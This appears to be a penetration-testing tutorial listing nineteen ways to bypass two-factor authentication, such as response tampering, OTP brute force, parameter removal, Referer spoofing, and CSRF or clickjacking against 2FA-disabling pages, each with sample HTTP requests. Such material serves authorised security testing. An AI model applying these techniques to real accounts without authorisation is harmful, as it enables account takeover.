Consider these techniques for bypassing 2FA implementation during penetration testing or bug bounty.
Method 1: Response Manipulation #
Intercept the response from the authentication request and modify the “success” field from “false” to “true” to bypass the 2FA check.
Original Response:
{
"success": false,
"message": "Authentication failed"
}Edited Response:
{
"success": true,
"message": "Authentication failed"
}Method 2: Status Code Manipulation #
Change the HTTP status code from a 4xx (indicating authentication failure) to a 200 OK status code to see if it allows access. This can trick the system into thinking the authentication was successful.
Original Response:
HTTP/1.1 401 Unauthorized
Content-Type: application/json
{
"error": "Invalid credentials"
}Edited Response:
HTTP/1.1 200 OK
Content-Type: application/json
{
"error": "Invalid credentials"
}Method 3: 2FA Code Leakage in Response #
Check the response of the 2FA Code Triggering Request to see if the 2FA code is leaked in the response body. If it is, it could be used to authenticate without going through the proper 2FA process.
HTTP/1.1 200 OK
Content-Type: application/json
{
"message": "Authentication successful",
"2fa_code": "123456"
}Method 4: 2FA Code Reusability #
Generate a 2FA code and use it for authentication. Attempt to reuse the same 2FA code in a different session. Successful reuse may indicate a security vulnerability.
POST /authenticate
Content-Type: application/json
{
"username": "user123",
"2fa_code": "123456"
}Method 5: JS File Analysis #
Assume you are testing a web application, and you suspect that a JavaScript file may contain information about the 2FA implementation.
Request:
GET /path/to/suspected-js-file.js HTTP/1.1
Host: example.comResponse:
HTTP/1.1 200 OK
Content-Type: application/javascript
// Sample JavaScript file
// This file may contain information about the 2FA implementation
var twoFactorEnabled = true;
var twoFactorMethod = "SMS";
function authenticateWith2FA() {
// Code for 2FA authentication
}
// ... Other JavaScript code ...You can then further analyze the JavaScript code to determine if there are any vulnerabilities or issues related to the 2FA implementation.
Method 6: Lack of Brute-Force Protection #
Exploit the absence of rate limiting on the 2FA API to brute-force the 2FA code. Try various codes until you find the correct one. You can use Burps Suite’s Intruder tool for the same.
POST /2fa
Content-Type: application/json
{
"username": "user123",
"2fa_code": "123456"
}Method 7: Missing 2FA Code Integrity Validation #
Exploit the absence of code integrity validation to check if you can use the same 2FA code for another user’s 2FA validation.
POST /authenticate
Content-Type: application/json
{
"username": "user123",
"2fa_code": "123456"
}Method 8: CSRF on 2FA Disabling #
Take advantage of the absence of CSRF protection to disable 2FA without the user’s knowledge.
POST /disable-2fa
Content-Type: application/json
{
"disable": true
}Method 9: Bypass 2FA using the “Remember me” functionality #
Attempt to bypass 2FA by using the “remember me” functionality, which may store 2FA information in a cookie, session, local storage, or IP address.
POST /authenticate
Content-Type: application/json
{
"username": "user123",
"remember_me": true
}Method 10: Direct Request to Post Authenticated Page #
GET /authenticated-apiDirectly hit an API that comes after 2FA or any authenticated page/API to see if it bypasses 2FA restrictions.
Method 11: 2FA Refer Check Bypass #
Navigate to an authenticated page and, if unsuccessful, change the Referer header to the 2FA page URL to trick the application into thinking the request came after satisfying 2FA.
GET /authenticated-page
Referer: https://example.com/2faMethod 12: Sequential OTP Number #
Check if the OTPs generated are sequential, allowing you to predict the next OTP. This can be exploited if the system generates predictable OTPs.
Valid OTP Request 1:
POST /request-otp
Content-Type: application/json
{
"2fa": "500060"
}Valid OTP Request 2:
POST /request-otp
Content-Type: application/json
{
"2fa": "500061"
}Method 13: Remove the OTP Parameter #
Attempt to bypass 2FA by removing the OTP parameter from the request.
Original Request:
POST /validate-otp
Content-Type: application/json
{
"email": "user@email.com",
"2fa": "500061"
}
Modified Request:
POST /validate-otp
Content-Type: application/json
{
"email": "user@email.com"
}Method 14: Manipulate the OTP Parameter Values #
Try various manipulations of the OTP parameter to see if you can bypass 2FA.
POST /validate-otp
Content-Type: application/json
{
"2fa": "123456", // make it "2fa": ""
"2fa": "123456", // make it "2fa": "null"
"2fa": "123456", // make it "2fa": "true"
"2fa": "123456", // make it "2fa": null
"2fa": "123456", // make it "2fa": "00000"Method 15: Password Reset/Email Change Disable 2FA #
After resetting the user’s password or changing their email, the 2FA might automatically be disabled, which could be exploited.
Method 16: Backup Code Abuse #
Attempt to use the Backup code feature to remove/reset 2FA restrictions. This might involve finding vulnerabilities in the handling of backup codes.
Method 17: Clickjacking on the 2FA Disabling Page #
Attempt to use clickjacking by iframing the 2FA disabling page and socially engineering the victim into disabling 2FA without their consent.
Method 18: Enabling 2FA doesn’t expire Previously active Sessions #
Exploit the behavior where enabling 2FA doesn’t expire previously active sessions, allowing unauthorized access to continue without 2FA.
Method 19: 2FA Code Validity #
- Request multiple 2FA codes, and check if previously requested 2FA codes can be used to authenticate.
- Request for MFA Code, wait for a longer time, and try using the same code; successful use may indicate a security vulnerability.
